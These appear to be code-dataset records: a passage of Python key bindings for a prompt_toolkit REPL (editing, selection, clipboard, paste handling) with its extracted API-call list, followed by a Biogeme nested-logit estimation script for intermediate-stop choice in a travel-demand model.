TODO: Use event.previous_key_sequence instead. if state and state[-1] != (text, cursor_position): state.clear() if len(state) == 0: # Replace all whitespace at the cursor (if any) with a single space. state.append((text, cursor_position)) cursor_position -= len(text_before_cursor) - len(rstripped) -1 text = rstripped + ' ' + lstripped state.append((text, cursor_position)) elif len(state) == 2: # Exactly one space at the cursor. Remove it. cursor_position -= 1 text = rstripped + lstripped state.append((text, cursor_position)) elif len(state) == 3: # Restore original text and cursor position text, cursor_position = state[0] state.clear() if cursor_position < 0: cursor_position = 0 if cursor_position > len(text): cursor_position = len(text) return text, cursor_position @r.add_binding(Keys.ControlX, Keys.ControlO) def delete_blank_lines(event): """ On blank line, delete all surrounding blank lines, leaving just one. On isolated blank line, delete that one. On nonblank line, delete any immediately following blank lines. """ buffer = event.app.current_buffer document = buffer.document lines_up_to_current = document.lines[:document.cursor_position_row+1] lines_after_current = document.lines[document.cursor_position_row+1:] blank_lines_before = 0 for line in lines_up_to_current[::-1]: if not line.strip(): blank_lines_before += 1 else: break blank_lines_after = 0 for line in lines_after_current: if not line.strip(): blank_lines_after += 1 else: break if not blank_lines_before: stripped_before = lines_up_to_current else: stripped_before = lines_up_to_current[:-blank_lines_before] stripped_after = lines_after_current[blank_lines_after:] # XXX: Emacs always keeps a newline at the end of the file, but I don't # think it matters here. if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1: new_text = '\n'.join(stripped_before + stripped_after) elif blank_lines_before + blank_lines_after == 0: return else: buffer.cursor_up(max(blank_lines_before-1, 0)) new_text = '\n'.join(stripped_before + [''] + stripped_after) # Even though we do auto_up, it can be out of bounds from trailing # whitespace buffer.cursor_position = min(buffer.cursor_position, len(new_text)) buffer.text = new_text @r.add_binding(Keys.ControlX, Keys.ControlT) def transpose_lines(event): buffer = event.current_buffer document = buffer.document row = document.cursor_position_row new_lines = document.lines[:] if len(new_lines) == 1: new_lines.append('') if row == 0: buffer.cursor_down() row += 1 if row == len(new_lines) - 1: new_lines.append('') new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row] buffer.text = '\n'.join(new_lines) buffer.cursor_down() beginning_of_line(event) # Selection stuff @r.add_binding(Keys.ShiftLeft) def select_left(event): buffer = event.current_buffer if buffer.document.text_before_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True buffer.cursor_position -= event.arg @r.add_binding(Keys.ShiftRight) def select_right(event): buffer = event.current_buffer if buffer.document.text_after_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True buffer.cursor_position += event.arg @r.add_binding(Keys.Up) def auto_up(event): buffer = event.current_buffer count = event.arg if buffer.document.cursor_position_row > 0: buffer.cursor_up(count=count) elif not buffer.selection_state: event.key_sequence[-1].accept_next = True buffer.history_backward(count=count) if getattr(buffer.selection_state, "shift_arrow", False): buffer.selection_state = None @r.add_binding(Keys.Down) def auto_down(event): buffer = event.current_buffer count = event.arg if buffer.document.cursor_position_row < buffer.document.line_count - 1: buffer.cursor_down(count=count) elif not buffer.selection_state: buffer.history_forward(count=count) if getattr(buffer.selection_state, "shift_arrow", False): buffer.selection_state = None @r.add_binding(Keys.ShiftUp) def select_line_up(event): buffer = event.current_buffer if buffer.document.text_before_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True up_position = buffer.document.get_cursor_up_position() buffer.cursor_position += up_position if not up_position: buffer.cursor_position = 0 @r.add_binding(Keys.ShiftDown) def select_line_down(event): buffer = event.current_buffer if buffer.document.text_after_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True down_position = buffer.document.get_cursor_down_position() buffer.cursor_position += down_position if not down_position: buffer.cursor_position = len(buffer.document.text) # The default doesn't toggle correctly @r.add_binding(Keys.ControlSpace) def toggle_selection(event): buffer = event.current_buffer if buffer.selection_state: buffer.selection_state = None else: buffer.start_selection() @r.add_binding(Keys.ControlX, 'h') def select_all(event): buffer = event.current_buffer buffer.selection_state = SelectionState(len(buffer.document.text)) buffer.cursor_position = 0 @r.add_binding(Keys.Delete, filter=HasSelection()) @r.add_binding(Keys.Backspace, filter=HasSelection()) def delete_selection(event): event.current_buffer.cut_selection() @r.add_binding(Keys.Any, filter=HasSelection()) def self_insert_and_clear_selection(event): event.current_buffer.cut_selection() self_insert(event) @r.add_binding(Keys.ControlK, filter=HasSelection()) @r.add_binding(Keys.ControlU, filter=HasSelection()) def kill_selection(event): data = event.current_buffer.cut_selection() event.app.clipboard.set_data(data) def system_copy(text): if "Linux" in platform.platform(): copy_command = ['xclip', '-selection', 'c'] else: copy_command = ['pbcopy'] try: # In Python 3.6 we can do this: # run(copy_command, input=text, encoding='utf-8', check=True) subprocess.run(copy_command, input=text.encode('utf-8'), check=True) except FileNotFoundError: print("Error: could not find", copy_command[0], file=sys.stderr) except subprocess.CalledProcessError as e: print(copy_command[0], "error:", e, file=sys.stderr) def system_paste(): if "Linux" in platform.platform(): paste_command = ['xsel', '-b'] else: paste_command = ['pbpaste'] try: # In Python 3.6 we can do this: # run(paste_command, input=text, encoding='utf-8') p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True) except FileNotFoundError: print("Error: could not find", paste_command[0], file=sys.stderr) except subprocess.CalledProcessError as e: print(paste_command[0], "error:", e, file=sys.stderr) return p.stdout.decode('utf-8') @r.add_binding(Keys.ControlX, Keys.ControlW) def copy_to_clipboard(event): if event.current_buffer.document.selection: from_, to = event.current_buffer.document.selection_range() run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1])) @r.add_binding(Keys.ControlX, Keys.ControlY) def paste_from_clipboard(event): paste_text_future = run_in_terminal(system_paste) event.current_buffer.cut_selection() paste_text_future.add_done_callback(lambda future:\ event.current_buffer.paste_clipboard_data(ClipboardData(future.result()))) # M-[ a b is set to C-S-/ (C-?) in iTerm2 settings Keys.ControlQuestionmark = "<C-?>" ALL_KEYS.append("<C-?>") ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark Keys.ControlSlash = "<C-/>" ALL_KEYS.append("<C-/>") ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash # This won't work until # https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is # merged. if prompt_toolkit_version[0] != '3': @r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False) def redo(event): event.current_buffer.redo() @r.add_binding(Keys.ControlSlash, save_before=lambda e: False) def undo(event): event.current_buffer.undo() # Need to escape all spaces here because of verbose (x) option below ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ '] ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?'] PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts)) PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts)) PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose (?P<prompt> (?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front | (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line. (?P<noprompt>(?(prompt)\r|))? # If the prompt is not # matched, this is a special # marker group that will match # the empty string. # Otherwise it will not # match (because all \r's # have been stripped from # the string). (?P<line>.*)\n # The actual line. '''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE)) def prompt_repl(match): r""" repl function for re.sub for clearing prompts Replaces PS1 prompts with \r and removes PS2 prompts. """ # TODO: Remove the lines with no prompt if match.group('ps1prompt') is not None: return '\r' + match.group('line') + '\n' elif match.group('ps2prompt') is not None: return match.group('line') + '\n' return '' def split_prompts(text, indent=''): r""" Takes text copied from mypython, Python, or IPython session and returns a list of inputs Outputs are stripped. If no prompts are found the text is left alone. The resulting text is indented by indent, except for the first line. It is assumed that the text contains no carriage returns (\r). Trailing whitespace and newlines is stripped from the outputs. Example: >>> split_prompts(''' ... In [1]: a = 1 ... ... In [2]: a ... Out[2]: 1 ... ... In [3]: def test(): ... ...: pass ... ...: ... ''') ['a = 1', 'a', 'def test():\n pass'] """ from .mypython import validate_text text = textwrap.dedent(text).strip() + '\n' text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip() lines = text.split('\r') # Make sure multilines end in two newlines for i, line in enumerate(lines): try: validate_text(line) except SyntaxError: # If there is a syntax error, we can't use the CMD_QUEUE (it # breaks things). lines = ['\n'.join(lines)] break if '\n' in line.rstrip(): lines[i] += '\n' lines[0] = textwrap.indent(lines[0], indent, # Don't indent the first line, it's already indented lambda line, _x=[]: bool(_x or _x.append(1))) for i in range(1, len(lines)): lines[i] = textwrap.indent(lines[i], indent) # Extraneous newlines at the end will be stripped by the prompt anyway. # This just makes this function easier to test. lines = [i.rstrip() for i in lines] return lines @r.add_binding(Keys.BracketedPaste) def bracketed_paste(event): from .mypython import CMD_QUEUE data = event.data buffer = event.current_buffer # Be sure to use \n as line ending. # This part is the same as the default binding # Some terminals (Like iTerm2) seem to paste \r\n line endings in a # bracketed paste. See: https://github.com/ipython/ipython/issues/9737 data = data.replace('\r\n', '\n') data = data.replace('\r', '\n') # Replace tabs with four spaces (C-x C-y will still paste the text exactly) data = data.replace('\t', ' ') # Strip prompts off pasted text document = buffer.document row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 if not inside_string(event.current_buffer.text, row, col): indent = LEADING_WHITESPACE.match(document.current_line_before_cursor) current_line_indent = indent.group(1) if indent else '' if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()): lines = split_prompts(data, current_line_indent) else: lines = [textwrap.indent(data, current_line_indent, # Don't indent the first line, it's already indented lambda line, _x=[]: bool(_x or _x.append(1)))] else: lines = [data] event.current_buffer.insert_text(lines[0]) for text in lines[1:]: # TODO: Send last chunk as bracketed paste, so it can be edited CMD_QUEUE.append(text) if CMD_QUEUE: accept_line(event) @r.add_binding(Keys.Escape, ';') def comment(event): buffer = event.current_buffer document = buffer.document cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position) if document.selection: from_, to = document.selection_range() start_line, start_col = document.translate_index_to_position(from_) end_line, end_col = document.translate_index_to_position(to - 1) end_line += 1 else: start_line = cursor_line end_line = start_line + 1 # Get the indentation for the comment delimiters min_indent = float('inf') for line in document.lines[start_line:end_line]: if not line.strip(): continue indent = LEADING_WHITESPACE.search(line) if indent: min_indent = min(min_indent, len(indent.group(1))) else: min_indent = 0 if min_indent == 0: break if min_indent == float('inf'): min_indent = 0 uncomment = (all(not line.strip() or line[min_indent] == '#' for line in document.lines[start_line:end_line]) and ''.join(document.lines[start_line:end_line]).strip()) lines = [] for i, line in enumerate(document.lines): if start_line <= i < end_line: if uncomment: lines.append(line[:min_indent] + line[min_indent+2:]) else: lines.append(line[:min_indent] + '# ' + line[min_indent:]) else: lines.append(line) new_text = '\n'.join(lines) # TODO: Set the cursor position correctly n_changed = 2*(cursor_line - start_line + 1) if cursor_line >= end_line - 1: n_changed -= 2 if uncomment: buffer.cursor_position -= n_changed buffer.text = new_text else: buffer.text = new_text buffer.cursor_position += n_changed @r.add_binding(Keys.ControlX, Keys.ControlE) def open_in_editor(event): event.current_buffer.open_in_editor(event.app) @r.add_binding(Keys.ControlX, Keys.ControlS) @r.add_binding(Keys.ControlX, Keys.ControlC) def noop(event): pass
[((1867, 1880), 'prompt_toolkit.key_binding.KeyBindings', 'KeyBindings', ([], {}), '()\n', (1878, 1880), False, 'from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings\n'), ((4468, 4497), 're.compile', 're.compile', (['"""\\\\S *(\\\\n *\\\\n)"""'], {}), "('\\\\S *(\\\\n *\\\\n)')\n", (4478, 4497), False, 'import re\n'), ((5391, 5447), 're.compile', 're.compile', (['"""([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)"""'], {}), "('([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')\n", (5401, 5447), False, 'import re\n'), ((13992, 14024), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<Shift-Enter>"""'], {}), "('<Shift-Enter>')\n", (14007, 14024), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((14652, 14675), 're.compile', 're.compile', (['"""( *)[^ ]?"""'], {}), "('( *)[^ ]?')\n", (14662, 14675), False, 'import re\n'), ((25290, 25314), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-?>"""'], {}), "('<C-?>')\n", (25305, 25314), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((25397, 25421), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-/>"""'], {}), "('<C-/>')\n", (25412, 25421), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((20051, 20075), 'prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line', 'beginning_of_line', (['event'], {}), '(event)\n', (20068, 20075), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((23213, 23231), 'prompt_toolkit.key_binding.bindings.named_commands.self_insert', 'self_insert', (['event'], {}), '(event)\n', (23224, 23231), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((24992, 25021), 'prompt_toolkit.application.run_in_terminal', 'run_in_terminal', (['system_paste'], {}), '(system_paste)\n', (25007, 25021), False, 'from prompt_toolkit.application import run_in_terminal\n'), ((13556, 13574), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (13567, 13574), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((15494, 15521), 'prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char', 'backward_delete_char', (['event'], {}), '(event)\n', (15514, 15521), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((22935, 22949), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (22947, 22949), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((22989, 23003), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23001, 23003), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23108, 23122), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23120, 23122), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23270, 23284), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23282, 23284), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23323, 23337), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23335, 23337), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23495, 23514), 'platform.platform', 'platform.platform', ([], {}), '()\n', (23512, 23514), False, 'import platform\n'), ((24059, 24078), 'platform.platform', 'platform.platform', ([], {}), '()\n', (24076, 24078), False, 'import platform\n'), ((24286, 24351), 'subprocess.run', 'subprocess.run', (['paste_command'], {'stdout': 'subprocess.PIPE', 'check': '(True)'}), '(paste_command, stdout=subprocess.PIPE, check=True)\n', (24300, 24351), False, 'import subprocess\n'), ((29068, 29101), 'textwrap.indent', 'textwrap.indent', (['lines[i]', 'indent'], {}), '(lines[i], indent)\n', (29083, 29101), False, 'import textwrap\n'), ((30835, 30853), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (30846, 30853), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((1601, 1622), 'prompt_toolkit.key_binding.bindings.basic.load_basic_bindings', 'load_basic_bindings', ([], {}), '()\n', (1620, 1622), False, 'from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings\n'), ((1633, 1654), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings', 'load_emacs_bindings', ([], {}), '()\n', (1652, 1654), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1664, 1692), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings', 'load_emacs_search_bindings', ([], {}), '()\n', (1690, 1692), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1702, 1739), 'prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings', 'load_emacs_page_navigation_bindings', ([], {}), '()\n', (1737, 1739), False, 'from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings\n'), ((1750, 1771), 'prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings', 'load_mouse_bindings', ([], {}), '()\n', (1769, 1771), False, 'from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings\n'), ((1781, 1800), 'prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings', 'load_cpr_bindings', ([], {}), '()\n', (1798, 1800), False, 'from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings\n'), ((12687, 12705), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12698, 12705), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((12873, 12891), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12884, 12891), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((11679, 11688), 'prompt_toolkit.application.current.get_app', 'get_app', ([], {}), '()\n', (11686, 11688), False, 'from prompt_toolkit.application.current import get_app\n'), ((25967, 25979), 're.escape', 're.escape', (['i'], {}), '(i)\n', (25976, 25979), False, 'import re\n'), ((28323, 28344), 'textwrap.dedent', 'textwrap.dedent', (['text'], {}), '(text)\n', (28338, 28344), False, 'import textwrap\n')]
gusugusu1018/simmobility-prod
demand/preday_model_estimation/isg.py
d30a5ba353673f8fd35f4868c26994a0206a40b6
from biogeme import * from headers import * from loglikelihood import * from statistics import * from nested import * #import random cons_work= Beta('cons for work', 0,-10,10,0) cons_edu = Beta('cons for education',0,-50,10,0) cons_shopping = Beta('cons for shopping',0,-10,10,0) cons_other = Beta('cons for other',0,-10,10,0) cons_Q = Beta('cons for quit',0,-10,10,1) first_stop_inbound= Beta('dummy for first stop of inbound half tour', 0,-10,10,1) second_stop_inbound= Beta('dummy for second stop of inbound half tour',0,-10,10,0) threeplus_stop_inbound=Beta('dummy for 3+ stop of inbound half tour',0,-10,10,0) first_stop_outbound= Beta('dummy for first stop of outbound half tour', 0,-10,10,0) second_stop_outbound= Beta('dummy for second stop of outbound half tour',0,-10,10,0) threeplus_stop_outbound=Beta('dummy for 3+ stop of outbound half tour',0,-10,10,0) work_tour_dummy_Q=Beta('work tour dummy in quit',0,-10,10,1) edu_tour_dummy_Q=Beta('edu tour dummy in quit',0,-10,10,1) shopping_tour_dummy_Q=Beta('shopping tour dummy in quit',0,-10,10,1) other_tour_dummy_Q=Beta('other tour dummy in quit',0,-10,10,1) first_tour_dummy_Q=Beta('first tour dummy in quit',0,-10,10,0) sub_tour_dummy_Q=Beta('has subtour dummy in quit',0,-10,10,0) zero_tour_remain_Q=Beta('zero tour remain dummy',0,-10,10,1) one_tour_remain_Q=Beta('one tour remain dummy',0,-10,10,0) twoplus_tour_remain_Q=Beta('2+ tour remain dummy',0,-10,10,1) work_tour_dummy_W=Beta('work tour dummy in work',0,-10,10,1) edu_tour_dummy_W=Beta('edu tour dummy in work',0,-10,10,1) shopping_tour_dummy_W=Beta('shopping tour dummy in work',0,-10,10,1) other_tour_dummy_W=Beta('other tour dummy in work',0,-10,10,1) female_dummy_W=Beta('female dummy in work',0,-10,10,0) student_dummy_W=Beta('student dummy in work',0,-10,10,1) worker_dummy_W=Beta('worker dummy in work',0,-10,10,1) driver_dummy_W=Beta('driver dummy in work',0,-10,10,0) passenger_dummy_W=Beta('passenger dummy in work',0,-10,10,0) public_dummy_W=Beta('PT dummy in work',0,-10,10,0) work_tour_dummy_E=Beta('work tour dummy in edu',0,-10,10,1) edu_tour_dummy_E=Beta('edu tour dummy in edu',0,-10,10,1) shopping_tour_dummy_E=Beta('shopping tour dummy in edu',0,-10,10,1) other_tour_dummy_E=Beta('other tour dummy in edu',0,-10,10,1) female_dummy_E=Beta('female dummy in edu',0,-10,10,0) student_dummy_E=Beta('student dummy in edu',0,-10,10,1) worker_dummy_E=Beta('worker dummy in edu',0,-10,10,1) driver_dummy_E=Beta('driver dummy in edu',0,-10,10,0) passenger_dummy_E=Beta('passenger dummy in edu',0,-10,10,0) public_dummy_E=Beta('PT dummy in edu',0,-10,10,0) work_tour_dummy_S=Beta('work tour dummy in shopping',0,-10,10,1) edu_tour_dummy_S=Beta('edu tour dummy in shopping',0,-10,10,1) shopping_tour_dummy_S=Beta('shopping tour dummy in shopping',0,-10,10,1) other_tour_dummy_S=Beta('other tour dummy in shopping',0,-10,10,0) female_dummy_S=Beta('female dummy in shopping',0,-10,10,0) student_dummy_S=Beta('student dummy in shopping',0,-10,10,1) worker_dummy_S=Beta('worker dummy in shopping',0,-10,10,0) driver_dummy_S=Beta('driver dummy in shopping',0,-10,10,0) passenger_dummy_S=Beta('passenger dummy in shopping',0,-10,10,0) public_dummy_S=Beta('PT dummy in shopping',0,-10,10,0) work_tour_dummy_O=Beta('work tour dummy in other',0,-10,10,0) edu_tour_dummy_O=Beta('edu tour dummy in other',0,-10,10,0) shopping_tour_dummy_O=Beta('shopping tour dummy in other',0,-10,10,0) other_tour_dummy_O=Beta('other tour dummy in other',0,-10,10,1) female_dummy_O=Beta('female dummy in other',0,-10,10,0) student_dummy_O=Beta('student dummy in other',0,-10,10,0) worker_dummy_O=Beta('worker dummy in other',0,-10,10,0) driver_dummy_O=Beta('driver dummy in other',0,-10,10,0) passenger_dummy_O=Beta('passenger dummy in other',0,-10,10,0) public_dummy_O=Beta('PT dummy in other',0,-10,10,0) work_logsum=Beta('work logsum in work',0,-10,10,1) edu_logsum=Beta('edu logsum in edu',0,-10,10,1) shop_logsum=Beta('shop logsum in shop',0,-10,10,1) other_logsum=Beta('other logsum in other',0,-10,10,1) time_window_work=Beta('time available in work',0,-10,10,1) time_window_edu= Beta('time available in edu',0,-10,10,1) time_window_shopping= Beta('time available in shopping',0,-10,10,1) time_window_other= Beta('time available in other',0,-10,10,1) tour_distance_work= Beta('log tour distance in work',0,-10,10,0) tour_distance_edu= Beta('log tour distance in edu',0,-10,10,0) tour_distance_shopping= Beta('log tour distance in shopping',0,-10,10,0) tour_distance_other=Beta('log tour distance in other',0,-10,10,0) a700_a930_work= Beta('period 7am to 9:30am in work',0,-10,10,0) a930_a1200_work=Beta('period 9:30am to 12pm in work',0,-10,10,0) p300_p530_work=Beta('period 3pm to 5:30pm in work',0,-10,10,0) p530_p730_work=Beta('period 5:30pm to 7:30 pm in work',0,-10,10,0) p730_p1000_work=Beta('period 7:30pm to 10pm in work',0,-10,10,0) p1000_a700_work=Beta('period 10pm to 7am in work',0,-10,10,0) a700_a930_edu= Beta('period 7am to 9:30am in edu',0,-10,10,0) a930_a1200_edu=Beta('period 9:30am to 12pm in edu',0,-10,10,0) p300_p530_edu=Beta('period 3pm to 5:30pm in edu',0,-10,10,0) p530_p730_edu=Beta('period 5:30pm to 7:30 pm in edu',0,-10,10,0) p730_p1000_edu=Beta('period 7:30pm to 10pm in edu',0,-10,10,0) p1000_a700_edu=Beta('period 10pm to 7am in edu',0,-10,10,0) a700_a930_shopping= Beta('period 7am to 9:30am in shopping',0,-10,10,0) a930_a1200_shopping=Beta('period 9:30am to 12pm in shopping',0,-10,10,0) p300_p530_shopping=Beta('period 3pm to 5:30pm in shopping',0,-10,10,0) p530_p730_shopping=Beta('period 5:30pm to 7:30 pm in shopping',0,-10,10,0) p730_p1000_shopping=Beta('period 7:30pm to 10pm in shopping',0,-10,10,0) p1000_a700_shopping=Beta('period 10pm to 7am in shopping',0,-10,10,0) a700_a930_other= Beta('period 7am to 9:30am in other',0,-10,10,0) a930_a1200_other=Beta('period 9:30am to 12pm in other',0,-10,10,0) p300_p530_other=Beta('period 3pm to 5:30pm in other',0,-10,10,0) p530_p730_other=Beta('period 5:30pm to 7:30 pm in other',0,-10,10,0) p730_p1000_other=Beta('period 7:30pm to 10pm in other',0,-10,10,0) p1000_a700_other=Beta('period 10pm to 7am in other',0,-10,10,0) MU1 = Beta('MU for quit',1,0,100,1) MU2 = Beta('MU for non-quit', 1.0,0,100,1) #V for work V_work= cons_work+\ work_tour_dummy_W*1*(tour_type==1)+\ edu_tour_dummy_W*1*(tour_type==2)+\ shopping_tour_dummy_W*1*(tour_type==3)+\ other_tour_dummy_W*1*(tour_type==4)+\ female_dummy_W*female_dummy+\ student_dummy_W*student_dummy+\ worker_dummy_W*worker_dummy+\ driver_dummy_W*driver_dummy+\ passenger_dummy_W*passenger_dummy+\ public_dummy_W*public_dummy+\ work_logsum * worklogsum+\ time_window_work*time_window_h+\ tour_distance_work*log(1+distance)+\ a700_a930_work*p_700a_930a+\ a930_a1200_work*p_930a_1200a+\ p300_p530_work*p_300p_530p+\ p530_p730_work*p_530p_730p+\ p730_p1000_work*p_730p_1000p+\ p1000_a700_work*p_1000p_700a #V for education V_edu = cons_edu+\ work_tour_dummy_E*1*(tour_type==1)+\ edu_tour_dummy_E*1*(tour_type==2)+\ shopping_tour_dummy_E*1*(tour_type==3)+\ other_tour_dummy_E*1*(tour_type==4)+\ female_dummy_E*female_dummy+\ student_dummy_E*student_dummy+\ worker_dummy_E*worker_dummy+\ driver_dummy_E*driver_dummy+\ passenger_dummy_E*passenger_dummy+\ public_dummy_E*public_dummy+\ edu_logsum * edulogsum+\ time_window_edu*time_window_h+\ tour_distance_edu*log(1+distance)+\ a700_a930_edu*p_700a_930a+\ a930_a1200_edu*p_930a_1200a+\ p300_p530_edu*p_300p_530p+\ p530_p730_edu*p_530p_730p+\ p730_p1000_edu*p_730p_1000p+\ p1000_a700_edu*p_1000p_700a #V for shopping V_shopping = cons_shopping+\ work_tour_dummy_S*1*(tour_type==1)+\ edu_tour_dummy_S*1*(tour_type==2)+\ shopping_tour_dummy_S*1*(tour_type==3)+\ other_tour_dummy_S*1*(tour_type==4)+\ female_dummy_S*female_dummy+\ student_dummy_S*student_dummy+\ worker_dummy_S*worker_dummy+\ driver_dummy_S*driver_dummy+\ passenger_dummy_S*passenger_dummy+\ public_dummy_S*public_dummy+\ shop_logsum * shoplogsum+\ time_window_shopping*time_window_h+\ tour_distance_shopping*log(1+distance)+\ a700_a930_shopping*p_700a_930a+\ a930_a1200_shopping*p_930a_1200a+\ p300_p530_shopping*p_300p_530p+\ p530_p730_shopping*p_530p_730p+\ p730_p1000_shopping*p_730p_1000p+\ p1000_a700_shopping*p_1000p_700a #V for other V_other=cons_other+\ work_tour_dummy_O*1*(tour_type==1)+\ edu_tour_dummy_O*1*(tour_type==2)+\ shopping_tour_dummy_O*1*(tour_type==3)+\ other_tour_dummy_O*1*(tour_type==4)+\ female_dummy_O*female_dummy+\ student_dummy_O*student_dummy+\ worker_dummy_O*worker_dummy+\ driver_dummy_O*driver_dummy+\ passenger_dummy_O*passenger_dummy+\ public_dummy_O*public_dummy+\ other_logsum * otherlogsum+\ time_window_other*time_window_h+\ tour_distance_other*log(1+distance)+\ a700_a930_other*p_700a_930a+\ a930_a1200_other*p_930a_1200a+\ p300_p530_other*p_300p_530p+\ p530_p730_other*p_530p_730p+\ p730_p1000_other*p_730p_1000p+\ p1000_a700_other*p_1000p_700a #V for quit V_quit= cons_Q+first_stop_inbound*first_stop*first_bound+\ second_stop_inbound*second_stop*first_bound+\ threeplus_stop_inbound*three_plus_stop*first_bound+\ first_stop_outbound*first_stop*second_bound+\ second_stop_outbound*second_stop*second_bound+\ threeplus_stop_outbound*three_plus_stop*second_bound+\ work_tour_dummy_Q*1*(tour_type==1)+\ edu_tour_dummy_Q*1*(tour_type==2)+\ shopping_tour_dummy_Q*1*(tour_type==3)+\ other_tour_dummy_Q*1*(tour_type==4)+\ first_tour_dummy_Q*first_tour_dummy+\ sub_tour_dummy_Q*has_subtour+zero_tour_remain_Q*1*(tour_remain==0)+\ one_tour_remain_Q*1*(tour_remain==1)+twoplus_tour_remain_Q*1*(tour_remain>=2) V = {0:V_quit,1: V_work,2:V_edu,3:V_shopping,4:V_other} av= {0:avail_quit,1:avail_workstop,2:avail_edustop,3:avail_shopstop,4:avail_otherstop} nest_quit = MU1 , [0] nest_nonquit = MU2 , [1,2,3,4] nests=nest_quit,nest_nonquit prob = nested(V,av,nests,stop_type) #prob = bioLogit(V,av,stop_type) rowIterator('obsIter') BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter') exclude = ((avail_violation==1)+(origin_mtz==0)+(destination_mtz==0)+(time_window_h>=10)) > 0 BIOGEME_OBJECT.EXCLUDE = exclude nullLoglikelihood(av,'obsIter') choiceSet = [0,1,2,3,4] cteLoglikelihood(choiceSet,stop_type,'obsIter') availabilityStatistics(av,'obsIter') BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP" BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1" BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "6"
[]
freestyletime/HumanResourceManagement
HRMS/app/__init__.py
